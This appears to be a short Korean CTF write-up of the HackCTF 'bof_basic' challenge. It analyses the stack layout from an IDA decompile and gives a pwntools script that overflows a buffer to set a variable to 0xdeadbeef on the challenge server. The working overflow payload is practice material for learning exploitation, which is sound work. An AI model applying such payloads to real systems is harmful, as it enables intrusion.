bof_basic 다운
IDA로 까보니 소스파일을 얻을 수 있다.
char s; // [esp+4h] [ebp-34h]
int v5; // [esp+2Ch] [ebp-Ch]
s = ebp - 34h = 52
v5 = ebp -Ch = 12
| ret |
| sfp |
| v5 |
| s |
fgets = 45개를 받으니 충분히 overflow를 발생시킬수 있을거같다.
v5 == -559038737이면 solve
-559038737는 10진수니 16진수로 바꿔서 넣어주자
16진수로 변환시 0xdeadbeef
from pwn import *
context.log_level = 'debug'
p = remote("ctf.j0n9hyun.xyz",3000)
pay = "\x90"*40 + "\xef\xbe\xad\xde"
p.sendline(pay)
p.interactive()
'Write-Up > HackCTF' 카테고리의 다른 글
| [HackCTF] x64 Simple_size_BOF (0) | 2021.05.16 |
|---|---|
| [HackCTF] x64 Buffer Overflow (0) | 2021.05.16 |
| [HackCTF] 내 버퍼가 흘러넘친다!!! (0) | 2021.05.15 |
| [HackCTF] Basic_FSB (0) | 2021.05.15 |
| [HackCTF] Basic_BOF #2 (0) | 2021.05.15 |
